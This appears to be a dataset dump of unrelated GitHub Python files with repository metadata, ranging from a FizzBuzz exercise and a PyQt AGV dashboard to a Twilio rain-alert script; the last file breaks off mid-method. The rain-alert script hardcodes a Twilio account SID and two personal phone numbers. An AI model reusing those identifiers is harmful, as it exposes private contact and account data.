252f6b30ab9c777e478f9d48787a4711d088af58 | 9729365a58351c9cf42edb932b8272db8ca98b6f | /CRIMSONModuleTemplate/Template/SolverStudies/template.py | 45d2b6ae369ddfa9a4917b294becfc854d13af01 | [] | no_license | rkhlebnikov/CRIMSONPythonModules | fbde5666aceae947a575f661518306694f052559 | b72865579e3b503940986e9217d3541a66ee92d5 | refs/heads/master | 2023-03-04T03:06:37.004018 | 2021-09-21T20:42:30 | 2021-09-21T20:42:30 | 48,180,113 | 3 | 3 | null | 2023-03-01T15:25:27 | 2015-12-17T14:50:33 | Python | UTF-8 | Python | false | false | 1,700 | py | from PythonQt import QtGui
from PythonQt.CRIMSON import FaceType
from PythonQt.CRIMSON import Utils
from CRIMSONCore.SolutionStorage import SolutionStorage
from {{ModuleName}}.BoundaryConditions import ({{#BoundaryConditionNames}}{{name}}, {{/BoundaryConditionNames}})
class {{ClassName}}(object):
def __init__(self):
self.meshNodeUID = ""
self.solverParametersNodeUID = ""
self.boundaryConditionSetNodeUIDs = []
self.materialNodeUIDs = []
def getMeshNodeUID(self):
return self.meshNodeUID
def setMeshNodeUID(self, uid):
self.meshNodeUID = uid
def getSolverParametersNodeUID(self):
return self.solverParametersNodeUID
def setSolverParametersNodeUID(self, uid):
self.solverParametersNodeUID = uid
def getBoundaryConditionSetNodeUIDs(self):
return self.boundaryConditionSetNodeUIDs
def setBoundaryConditionSetNodeUIDs(self, uids):
self.boundaryConditionSetNodeUIDs = uids
def getMaterialNodeUIDs(self):
return self.materialNodeUIDs
def setMaterialNodeUIDs(self, uids):
self.materialNodeUIDs = uids
def loadSolution(self):
# Implement if needed - see documentation
pass
def writeSolverSetup(self, vesselForestData, solidModelData, meshData, solverParameters, boundaryConditions,
materials, vesselPathNames, solutionStorage):
# Get the output folder
outputDir = QtGui.QFileDialog.getExistingDirectory(None, 'Select output folder')
if not outputDir:
return
# Write the files for your solver. See documentation for details
raise NotImplementedError() | [
"r.khlebnikov@gmail.com"
] | r.khlebnikov@gmail.com |
b5bfb5e75a09d0dabb71a971677befdb2e4ce011 | b0c40ad8f68f099a49449efcc037ee6bfdafa5e2 | /python/20190508 challenges/fizzbuzz_game_answer.py | 4dd00810b33d34b2ec089b8d909508c36943b60a | [] | no_license | behappyny/python_study | f8f2dc1ed7070290af82274da5c411e68e19e2a8 | 556c715047d09d60213f9d098ebd29124a9fdc0a | refs/heads/master | 2020-03-08T13:31:34.955775 | 2019-05-14T03:13:25 | 2019-05-14T03:13:25 | 128,160,093 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | a = 30
if a % 15 == 0:
print('FizzBuzz')
elif a % 3 == 0:
print('Fizz')
elif a % 5 == 0:
print('Buzz')
else:
print('a') | [
"noreply@github.com"
] | noreply@github.com |
a3e8f85b15362854f00e8158fedd47775ff9a1fb | 9b5597492e57313712c0a842ef887940f92636cd | /judge/sessions/2018Individual/sgessow@gmail.com/PB_02.py | f67c2bfbbc1ddd96d57cfd996db5fcf43c0930bf | [] | no_license | onionhoney/codesprint | ae02be9e3c2354bb921dc0721ad3819539a580fa | fcece4daf908aec41de7bba94c07b44c2aa98c67 | refs/heads/master | 2020-03-11T11:29:57.052236 | 2019-05-02T22:04:53 | 2019-05-02T22:04:53 | 129,971,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | Cases=input()
Cases=int(Cases)
for i in range(Cases):
Num1= [int(x) for x in input().split()]
Num2= [int(x) for x in input().split()]
Num3= [int(x) for x in input().split()]
count=0
ans=[]
for i in Num1:
if i==1:
ans.append(count)
count=count+1
count=0
for i in Num2:
if i==1:
ans.append(count)
count=count+1
count=0
for i in Num3:
if i==1:
ans.append(count)
count=count+1
print(ans[0],ans[1],ans[2])
| [
"root@codesprintla.com"
] | root@codesprintla.com |
4fcb401701f06fd6fd59e2e4e19e1e9a75953692 | 0f4c9d1a717b362291ce6eedca3160ce23532e0d | /day-35-rain-alert/main1.py | 8ee7f6f3d2cf2789304b054cada1e1d35724b7f7 | [] | no_license | leba0495/100-Days-Of-Python-Journey | 2de22e784b3b18e00edf60ad788158a3c169d14e | 9df993b10c29f610b5d7504b0c3a29e08677ce77 | refs/heads/main | 2023-02-22T08:47:34.588505 | 2021-01-24T23:37:57 | 2021-01-24T23:37:57 | 324,022,719 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | import requests
import os
from twilio.rest import Client
from twilio.http.http_client import TwilioHttpClient
# Info for request from OpenWeather
OWM_Endpoint = "https://api.openweathermap.org/data/2.5/onecall?"
API_KEY = os.environ.get("OMW_API_KEY")
MY_LAT = 40.678177
MY_LONG = -73.944160
# Info for twilio functionality
account_sid = "AC1e6a6f8e68b0b3b68d7cb65aa5371f20"
auth_token = os.environ.get("AUTH_TOKEN")
weather_params = {
"lat": MY_LAT,
"lon": MY_LONG,
"appid": API_KEY,
"exclude": "current,minutely,daily,alert"
}
def check_for_rain(code_list):
for code in code_list:
if code < 700:
return True
return False
response = requests.get(OWM_Endpoint, params=weather_params)
response.raise_for_status()
weather_data = response.json()
hourly_data_list = weather_data["hourly"][0:12]
weather_codes = [hour["weather"][0]["id"] for hour in hourly_data_list]
if check_for_rain(weather_codes):
proxy_client = TwilioHttpClient()
proxy_client.session.proxies = {'https': os.environ['https_proxy']}
client = Client(account_sid, auth_token, http_client=proxy_client)
message = client.messages.create(
body="It's going to rain today. Remember to bring an umbrella ☂️",
from_="+19495580047",
to="+16464705796"
)
print(message.status)
| [
"noreply@github.com"
] | noreply@github.com |
6698de943e743d11300f391dd839dad9369a9914 | c2f4afee3ec4faef7231da2e48c8fef3d309b3e3 | /AppendFile.py | 7fcd0d08932bb7aacd4bdcc2a8461d8776ca7cac | [] | no_license | tanu312000/pyChapter | a723f99754ff2b21e694a9da3cb2c6ca0cd10fce | 2fd28aefcbfaf0f6c34db90fdf0d77f9aea142ce | refs/heads/master | 2020-05-03T15:51:34.334806 | 2019-03-31T16:17:45 | 2019-03-31T16:17:45 | 178,712,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | '''#WAP to read line by line from keyboard & append to a list until n times. Break the loop under break condition.
#Step:1
# 1)ReadLine from keyboard
Line=input("Enter a Line"+"\n")
# 2)Append in the list
li=[]
li.append(Line)
# 3)Until n times
while True:
Status=input("Do you want to continue")
# 4)Break the condition
if(Status=="no"):
break
print("Success")
# 5)Write in a file'''
fp=open("/home/tanu/programs/pythonFiles/AppendFile.txt",'a')
li=[]
while True:
Line=(input("Enter a line")+"\n")
li.append(Line)
Status=input("Do you want to Continue")
if(Status=="No"):
print("Success")
break
fp.writelines(li)
fp.close()
| [
"tanurocks90@gmail.com"
] | tanurocks90@gmail.com |
c361dedd1d0804ff593bc36fb18646206b67bd9a | 289697340c92e61dacbb921b7fd63201e7056eea | /agv2/Paint.py | 761918a9305fd2b0c163a661786923f90080b35c | [] | no_license | zhenhuic/projects-summary | 51a5c6e1411c69d96491a7775d7ce1ae8a1714bd | bb7dce6b5e2b18d783bec6dddca203721462e709 | refs/heads/master | 2022-12-30T22:24:14.788445 | 2020-10-23T13:13:34 | 2020-10-23T13:13:34 | 252,084,716 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17,313 | py | import sys, math
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import Qt, QRect
import time
#from carshow import Ui_mainwindow
# 读取所有点的数据 并用字典 id:[x,y]存储
def readpoints():
points = {}
with open('newpoint1.txt') as f:
for line in f:
point = line.split(',', -1)[0].strip()
x = line.split(',', -1)[1].strip()
y = line.split(',', -1)[2].strip()
points[point] = [x, y]
return points
class draw(QLabel):
def __init__(self, *__args):
super().__init__(*__args)
#self.data = {1: 1, 2: 89, 3: 2, 4: 34, 5: 56, 6: 6, 7: 55, 8: 7, 9: 78}
self.data = {'carStart1': 82, 'carStart2': 825, 'carStart3': 13675, 'carStart4': 666,
'carStart5': 89, 'carStart6': 566, 'carStart7': 372, 'carStart8': 333, 'carStart9': 582,
'carFault1': "故障", 'carFault2': "无故障", 'carFault3': "无故障", 'carFault4': "无故障",
'carFault5': "无故障", 'carFault6': "故障", 'carFault7': "无故障", 'carFault8': "故障", 'carFault9': "无故障",
'carState1': "空闲", 'carState2': "挂起", 'carState3': "运行", 'carState4': "运行",
'carState5': "空闲", 'carState6': "运行", 'carState7': "空闲", 'carState8': "运行", 'carState9': "运行",
'faultCode1': '500', 'faultCode6': '511', 'faultCode8': '514', 'carAction1': "取货",
'carAction2': "取货", 'carAction3': "取货", 'carAction4': "取货", 'carAction5': "送货", 'carAction6': "送货",
'carAction7': "送货", 'carAction8': "二期取货", 'carAction9': "二期取货",'carNumber1': '1',
'carNumber2': '2', 'carNumber3': '3', 'carNumber4': '4', 'carNumber5': '5',
'carNumber6': '6', 'carNumber7': '7', 'carNumber8': '8', 'carNumber9': '9'}
def paintEvent(self, event):
# 故障小车数量num1 运行小车数量num2 空闲小车数量num3 挂起、静态操作 逻辑离线小车数量num4
num1, num2, num3, num4 = 0, 0, 0, 0
# 小车不同状态的具体车号
guzhang = ''
yunxing = ''
kongxian = ''
qita = ''
points = readpoints()
size = self.size()
painter = QPainter()
painter.begin(self)
# painter.setBrush(Qt.black)
painter.drawRect(self.rect())
faultCodes = {'500': '发现障碍', '501': '用户暂停', '502': '控制台避免碰撞', '503': '发生碰撞', '504': '地标丢失',
'505': '急停按钮按下', '506': '导航信号弱', '507': '电池故障', '508': '伺服轴超差', '509': '伺服驱动器故障',
'510': '伺服电源故障', '511': '从等待状态退出', '512': '临时停车', '513': '通讯中断', '514': 'MCU的CAN通讯中断',
'515': '设备故障', '516': '舱限位开关作用', '517': '失速保护', '518': 'MCU的ALL-OK信号中断', '519': 'PLS安全继电器故障',
'520': 'PLS急停', '521': '电池异常', '522': '电池电压低', '523': '电池电压过低', '524': '电池系统故障',
'525': '同步传感器故障', '526': 'MCU通讯故障', '527': 'IO扩展块故障', '528': '上线节点不匹配', '529': '货物验证错误',
'530': '死锁无法解除', '531': '机械臂故障', '532': '地标传感器故障', '533': '导航传感器故障', '534': '路由搜索不通'}
# 画宽路
pen = QPen(QColor(0, 255, 128))
painter.setPen(pen)
painter.setBrush(QColor(0, 255, 128))
# 节点448 至 358
x = (-80.584 + 130) / 130 * size.width()
y = (163 - 133) / 90 * size.height()
painter.drawRect(x, y, 75.251 / 130 * size.width(), 2 / 90 * size.height())
# 节点987 至 931
x = (-125.663 + 130) / 130 * size.width()
y = (163 - 121.2) / 90 * size.height()
painter.drawRect(x, y, 58.135 / 130 * size.width(), 2 / 90 * size.height())
# 节点 160 至 82
x = (-80.584 + 130) / 130 * size.width()
y = (163 - 103) / 90 * size.height()
painter.drawRect(x, y, 73.751 / 130 * size.width(), 2 / 90 * size.height())
# 节点 1043 至 897
x = (-98.401 + 130) / 130 * size.width()
y = (163 - 82.8) / 90 * size.height()
painter.drawRect(x, y, 26.911 / 130 * size.width(), 2 / 90 * size.height())
# 节点 380 至 82
x = (-7.2 + 130) / 130 * size.width()
y = (163 - 151.5) / 90 * size.height()
painter.drawRect(x, y, 2.18 / 130 * size.width(), 50.5 / 90 * size.height())
# 节点 448 至 562
x = (-83 + 130) / 130 * size.width()
y = (163 - 133) / 90 * size.height()
painter.drawRect(x, y, 2.8 / 130 * size.width(), 52.8 / 90 * size.height())
pen = QPen(QColor(200, 200, 200), 1.5, Qt.SolidLine)
painter.setPen(pen)
# 画路线
with open('linearg1.txt') as f:
for line in f:
point1 = line.split(',', -1)[1].strip()
point2 = line.split(',', -1)[2].strip()
x1 = (float(points[point1][0]) + 130) / 130 * size.width()
y1 = (163 - float(points[point1][1])) / 90 * size.height()
x2 = (float(points[point2][0]) + 130) / 130 * size.width()
y2 = (163 - float(points[point2][1])) / 90 * size.height()
painter.drawLine(x1, y1, x2, y2)
# 画点
# with open('newpoint1.txt') as f:
# for line in f:
# x = float(line.split(',', -1)[1].strip())
# y = float(line.split(',', -1)[2].strip())
# point = line.split(',', -1)[0].strip()
# x = (x + 130) / 130
# y = (155 - y) / 90
# x = x * 1920
# y = y * 1080
#
# pen = QPen(QColor(128, 0, 0), 3) # 3是画笔的粗细
# painter.setPen(pen)
# painter.drawPoint(x, y)
# # painter.drawArc(x, y, 3, 3, 0, 360*16)
# # pen = QPen(QColor(60,179,113), 1)
# pen = QPen(Qt.darkGreen)
# painter.setPen(pen)
# painter.setFont(QFont('Times New Roman', 7))
# painter.drawText(x + 3, y - 1, point)
#pen = QPen(QColor(141, 141, 212))
pen = QPen(QColor(60, 60, 60))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 14))
painter.drawText(0.0677 * size.width(), 0.4109 * size.height(), '装箱线1号库')
painter.drawText(0.0187 * size.width(), 0.4409 * size.height(), '装箱线2号库')
painter.drawText(0.4427 * size.width(), 0.5446 * size.height(), '旧萨瓦取货库位')
painter.drawText(0.4149 * size.width(), 0.9609 * size.height(), '新萨瓦取货库位')
painter.drawText(0.9004 * size.width(), 0.1093 * size.height(), '手工焊接缓存库位')
painter.drawText(0.9071 * size.width(), 0.1732 * size.height(), '充电站')
painter.drawText(0.5078 * size.width(), 0.7031 * size.height(), '机器人1缓存库位')
painter.drawText(0.5500 * size.width(), 0.6401 * size.height(), '机器人取货库位')
painter.drawText(0.6338 * size.width(), 0.7040 * size.height(), '机器人2缓存库位')
painter.drawText(0.7218 * size.width(), 0.7089 * size.height(), '自动焊接取货库位')
painter.drawText(0.2013 * size.width(), 0.3931 * size.height(), '货物库位缓存区')
painter.drawText(0.4020 * size.width(), 0.5595 * size.height(), '充电站')
painter.drawText(0.3723 * size.width(), 0.9762 * size.height(), '充电站')
painter.drawText(0.4697 * size.width(), 0.7277 * size.height(), '停车站')
painter.drawText(0.1630 * size.width(), 0.4438 * size.height(), '停车站')
painter.drawText(0.2114 * size.width(), 0.4271 * size.height(), '停车站')
painter.drawText(0.3494 * size.width(), 0.4271 * size.height(), '停车站')
painter.drawText(0.2906 * size.width(), 0.3931 * size.height(), '停车站')
for i in range(1, 10):
# if str(self.data[i]) in points:
# print('dsds')
# x = (float(points[str(self.data[i])][0]) + 130) / 130 * 1920
# y = (155 - float(points[str(self.data[i])][1])) / 90 * 1080
# painter.drawEllipse(x - 10, y - 10, 20, 20)
# #pen = QPen(QColor(255, 240, 245))
# pen = QPen(QColor(0, 0, 0))
# painter.setPen(pen)
# painter.drawText(x - 4, y + 6, str(i))
if str(self.data['carStart' + str(i)]) in points:
pen = QPen(QColor(255, 162, 117))
painter.setPen(pen)
painter.setBrush(QColor(255, 162, 117))
x = (float(points[str(self.data['carStart' + str(i)])][0]) + 130) / 130 * size.width()
y = (163 - float(points[str(self.data['carStart' + str(i)])][1])) / 90 * size.height()
# 描述每辆非故障小车的当前动作
if str(self.data['carFault' + str(i)]) != "故障":
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 24, QFont.Bold))
#painter.drawText(70 + (i - 1) * size.width() * 0.095, 210, str(self.data['carState' + str(i)]))
# 判断是否空闲 为绿
if str(self.data['carState' + str(i)]) == "空闲":
kongxian = kongxian + str(self.data['carNumber' + str(i)]) + '号 '
num3 = num3 + 1
pen = QPen(QColor(0, 128, 0))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 0))
elif str(self.data['carState' + str(i)]) == "运行":
yunxing = yunxing + str(self.data['carNumber' + str(i)]) + '号 '
num2 = num2 + 1
pen = QPen(QColor(0, 128, 255))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 255))
elif str(self.data['carState' + str(i)]) == "挂起" or str(self.data['carState' + str(i)]) == "静态" or str(self.data['carState' + str(i)]) == "离线":
qita = qita + str(self.data['carNumber' + str(i)]) + '号 '
num4 = num4 + 1
pen = QPen(QColor(162, 162, 162))
painter.setPen(pen)
painter.setBrush(QColor(162, 162, 162))
# 判断是否故障 为红
if str(self.data['carFault' + str(i)]) == "故障":
self.data['carState' + str(i)] = '故障'
# print("故障")
guzhang = guzhang + str(self.data['carNumber' + str(i)]) + '号 '
pen = QPen(QColor(255, 60, 60), 1.5, Qt.SolidLine)
painter.setPen(pen)
painter.drawLine(x, y, x - 23, y - 17)
# painter.setBrush(QColor(192, 192, 192))
painter.setBrush(Qt.NoBrush)
painter.drawEllipse(x - 155, y - 40, 130, 30)
if self.data['faultCode' + str(i)] in faultCodes:
code = self.data['faultCode' + str(i)]
painter.setFont(QFont('微软雅黑', 13, QFont.Bold))
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.drawText(x - 140, y - 15, faultCodes[code])
num1 = num1 + 1
pen = QPen(QColor(255, 60, 60))
painter.setPen(pen)
painter.setBrush(QColor(255, 60, 60))
# painter.drawEllipse(x - 10, y - 10, 20, 20)
painter.drawRect(x - 12.5, y - 10, 25, 20)
pen = QPen(QColor(255, 255, 255))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 14, QFont.Bold))
painter.drawText(x - 4, y + 6, str(self.data['carNumber' + str(i)]))
#显示各小车的顶部状态栏
painter.drawEllipse(30 + (i-1) * size.width() * 0.095, 70, 150, 150)
pen = QPen(QColor(255, 255, 255))
painter.setPen(pen)
painter.setBrush(QColor(255, 255, 255))
painter.drawEllipse(75 + (i - 1) * size.width() * 0.095, 115, 60, 60)
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 28, QFont.Bold))
painter.drawText(97 + (i - 1) * size.width() * 0.095, 160, str(self.data['carNumber' + str(i)]))
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 24, QFont.Bold))
painter.drawText(70 + (i - 1) * size.width() * 0.095, 210, str(self.data['carState' + str(i)]))
elif str(self.data['carStart' + str(i)]).isdigit():
pen = QPen(QColor(0, 128, 255))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 255))
# pen = QPen(QColor(162, 162, 162))
# painter.setPen(pen)
# painter.setBrush(QColor(162, 162, 162))
painter.drawEllipse(30 + (i - 1) * size.width() * 0.095, 70, 150, 150)
pen = QPen(QColor(255, 255, 255))
painter.setPen(pen)
painter.setBrush(QColor(255, 255, 255))
painter.drawEllipse(75 + (i - 1) * size.width() * 0.095, 115, 60, 60)
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 28, QFont.Bold))
painter.drawText(97 + (i - 1) * size.width() * 0.095, 160, str(self.data['carNumber' + str(i)]))
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 24, QFont.Bold))
painter.drawText(70 + (i - 1) * size.width() * 0.095, 210, str(self.data['carState' + str(i)]))
#painter.drawText(70 + (i - 1) * size.width() * 0.095, 210, '暂无')
# 显示 故障小车数量num1 运行小车数量num2 空闲小车数量num3 挂起、静态操作 逻辑离线小车数量num4
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 16))
painter.drawText(0.0507 * size.width(), 0.5966 * size.height(), '故障小车---')
painter.drawText(0.0507 * size.width(), 0.6366 * size.height(), '运行小车---')
painter.drawText(0.0507 * size.width(), 0.6766 * size.height(), '空闲小车---')
painter.drawText(0.0077 * size.width(), 0.7166 * size.height(), '挂起、静态、离线---')
pen = QPen(QColor(255, 60, 60))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 16, QFont.Bold))
#painter.setFontPointSize(QFont.Bold)
painter.drawText(0.1287 * size.width(), 0.5966 * size.height(), guzhang)
pen = QPen(QColor(0, 128, 255))
painter.setPen(pen)
painter.drawText(0.1287 * size.width(), 0.6366 * size.height(), yunxing)
pen = QPen(QColor(0, 128, 0))
painter.setPen(pen)
painter.drawText(0.1287 * size.width(), 0.6766 * size.height(), kongxian)
pen = QPen(QColor(162, 162, 162))
painter.setPen(pen)
painter.drawText(0.1187 * size.width(), 0.7166 * size.height(), qita)
pen = QPen(QColor(255, 60, 60))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 16))
painter.setBrush(QColor(255, 60, 60))
# painter.drawEllipse(0.0477 * size.width(), 0.5726 * size.height(), 15, 15)
painter.drawRect(0.0687 * size.width(), 0.7526 * size.height(), 20, 15)
pen = QPen(QColor(0, 128, 255))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 255))
painter.drawRect(0.0687 * size.width(), 0.7806 * size.height(), 20, 15)
pen = QPen(QColor(0, 128, 0))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 0))
painter.drawRect(0.0687 * size.width(), 0.8086 * size.height(), 20, 15)
pen = QPen(QColor(162, 162, 162))
painter.setPen(pen)
painter.setBrush(QColor(162, 162, 162))
painter.drawRect(0.0687 * size.width(), 0.8366 * size.height(), 20, 15)
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.drawText(0.091 * size.width(), 0.767 * size.height(), '---- 故障')
painter.drawText(0.091 * size.width(), 0.795 * size.height(), '---- 运行中')
painter.drawText(0.091 * size.width(), 0.823 * size.height(), '---- 空闲')
painter.drawText(0.091 * size.width(), 0.851 * size.height(), '---- 挂起、静态、离线')
painter.end()
| [
"zhenhuiccc@gmail.com"
] | zhenhuiccc@gmail.com |
cc3f3c2352289d73e494b36f97e557535e657bed | c8bf3e2b94fe9a296e688cbb419563e0fa77c9c3 | /test_video.py | 5aefa09fb132c217bc47f87f01f18b8c6a0c5315 | [] | no_license | josefmtd/test-cv | 306884b4c185db6dbf02a683ccd0866c053f402a | ee40195bff27be068e58bccfa5ae0f60d9b6db68 | refs/heads/master | 2020-03-20T09:34:30.164397 | 2018-06-15T03:57:20 | 2018-06-15T03:57:20 | 137,341,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | # import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = (640,480)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(640, 480))
# allow the camera to warmup
time.sleep(0.1)
# capture frames from the camera
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image, then initialize the timestamp
# and occupied/unoccupied text
image = frame.array
# show the frame
cv2.imshow("Frame", image)
key = cv2.waitKey(1) & 0xFF
# clear the stream
rawCapture.truncate(0)
# if the 'q' key was pressed, break from the loop
if key == ord("q"):
break
| [
"josstemat@gmail.com"
] | josstemat@gmail.com |
9090363a9ae18d37db75ef5f9cfa91a9746969d5 | 054b2c78cf70a81823da522f1bb5889f42787365 | /mudao/ui/__init__.py | 78dc516a1d30d973d1d13ab0207c9f1ca480fe43 | [] | no_license | musum/mudao | 9537ca1f6262b1271f9c4f6a247e00549762d254 | fbf8c507aa6e1755ac4126d7e4d75ace99b97fd4 | refs/heads/master | 2020-03-26T16:27:59.967129 | 2018-11-11T10:40:46 | 2018-11-11T10:40:46 | 145,103,715 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | from mudao.ui.uiFile import FilePannel
from mudao.ui.uiCmd import CmdPannel
from mudao.ui.uiMain import MainWindow
| [
"test@test.com"
] | test@test.com |
33f06e48105dd16509b58527c0eed07ca7ed05a6 | bc441bb06b8948288f110af63feda4e798f30225 | /cmdb_sdk/model/notify/subscriber_pb2.pyi | f37ead231f841e671f9d1f218fbe6e05d86a7244 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,884 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from cmdb_sdk.model.notify.subscribe_info_pb2 import (
SubscribeInfo as cmdb_sdk___model___notify___subscribe_info_pb2___SubscribeInfo,
)
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class Subscriber(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
name = ... # type: typing___Text
admin = ... # type: typing___Text
callback = ... # type: typing___Text
ensName = ... # type: typing___Text
procNum = ... # type: builtin___int
msgType = ... # type: builtin___int
retry = ... # type: builtin___int
@property
def subscribeInfo(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[cmdb_sdk___model___notify___subscribe_info_pb2___SubscribeInfo]: ...
def __init__(self,
*,
name : typing___Optional[typing___Text] = None,
admin : typing___Optional[typing___Text] = None,
callback : typing___Optional[typing___Text] = None,
ensName : typing___Optional[typing___Text] = None,
procNum : typing___Optional[builtin___int] = None,
msgType : typing___Optional[builtin___int] = None,
retry : typing___Optional[builtin___int] = None,
subscribeInfo : typing___Optional[typing___Iterable[cmdb_sdk___model___notify___subscribe_info_pb2___SubscribeInfo]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Subscriber: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Subscriber: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"admin",b"admin",u"callback",b"callback",u"ensName",b"ensName",u"msgType",b"msgType",u"name",b"name",u"procNum",b"procNum",u"retry",b"retry",u"subscribeInfo",b"subscribeInfo"]) -> None: ...
| [
"service@easyops.cn"
] | service@easyops.cn |
89fdc67025f1d1105bd747a337937acde1171361 | e9d25b27509087df06acb685fe08a335fb72113b | /project_stock/project_stock/migrations/0006_auto_20160511_1246.py | 7c576a85e507cfa8dec282f8817ba396e01ba9e6 | [] | no_license | cenh/ProjectStockSD | 32cfa4d9ee6b8b81a0faaac47a1fc545476f92c0 | 7611c6a9152a9a8d0dc237eb12bf604fdd718c2f | refs/heads/master | 2020-05-20T06:03:50.960284 | 2016-06-15T10:23:52 | 2016-06-15T10:23:52 | 51,740,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-05-11 10:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('project_stock', '0005_project_end_date'),
]
operations = [
migrations.AlterField(
model_name='project',
name='subject',
field=models.CharField(blank=True, default='', max_length=128),
),
]
| [
"ninjalf2@gmail.com"
] | ninjalf2@gmail.com |
c868dac673e8b151e58bccdabedd5a1e9275f883 | 115098a64947ccb9310e1f4d8bd44f9ca3eb6821 | /wp.py | 551dde359ea9fc48469d61fa1158ef01fe0eaee2 | [
"MIT"
] | permissive | wakanapo/wpsearch | 73264b34fedaf104d90e59d5187e8ac6a79ffccf | bbf480f02ac4ae0a7a489e9d216c149c3c375dc6 | refs/heads/master | 2020-03-07T13:06:24.376364 | 2018-03-29T23:47:21 | 2018-03-29T23:47:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,493 | py | import sqlite3
import sys
import json
class Document():
"""Abstract class representing a document.
"""
def id(self):
"""Returns the id for the Document. Should be unique within the Collection.
"""
raise NotImplementedError()
def text(self):
"""Returns the text for the Document.
"""
raise NotImplementedError()
class Collection():
"""Abstract class representing a collection of documents.
"""
def get_document_by_id(self, id):
"""Gets the document for the given id.
Returns:
Document: The Document for the given id.
"""
raise NotImplementedError()
def num_documents(self):
"""Returns the number of documents.
Returns:
int: The number of documents in the collection.
"""
raise NotImplementedError()
def get_all_documents(self):
"""Creates an iterator that iterates through all documents in the collection.
Returns:
Iterable[Document]: All the documents in the collection.
"""
raise NotImplementedError()
class WikipediaArticle(Document):
"""A Wikipedia article.
Attributes:
title (str): The title. This will be unique so it can be used as the id. It will also always be less than 256 bytes.
_text (str): The plain text version of the article body.
opening_text (str): The first paragraph of the article body.
auxiliary_text (List[str]): A list of auxiliary text, usually from the inbox.
categories (List[str]): A list of categories.
headings (List[str]): A list of headings (i.e. the table of contents).
wiki_text (str): The MediaWiki markdown source.
popularity_score(float): Some score indicating article popularity. Bigger is more popular.
num_incoming_links(int): Number of links (within Wikipedia) that point to this article.
"""
def __init__(self, collection, title, text, opening_text, auxiliary_text, categories, headings, wiki_text, popularity_score, num_incoming_links):
self.title = title
self._text = text
self.opening_text = opening_text
self.auxiliary_text = auxiliary_text # list
self.categories = categories
self.headings = headings
self.wiki_text = wiki_text
self.popularity_score = popularity_score
self.num_incoming_links = num_incoming_links
def id(self):
"""Returns the id for the WikipediaArticle, which is its title.
Override for Document.
Returns:
str: The id, which in the Wikipedia article's case, is the title.
"""
return self.title
def text(self):
"""Returns the text for the Document.
Override for Document.
Returns:
str: Text for the Document
"""
return self._text
class WikipediaCollection(Collection):
"""A collection of WikipediaArticles.
"""
def __init__(self, filename):
self._cached_num_documents = None
self.db = sqlite3.connect(filename)
def find_article_by_title(self, query):
"""Finds an article with a title matching the query.
Returns:
WikipediaArticle: Returns matching WikipediaArticle.
"""
c = self.db.cursor()
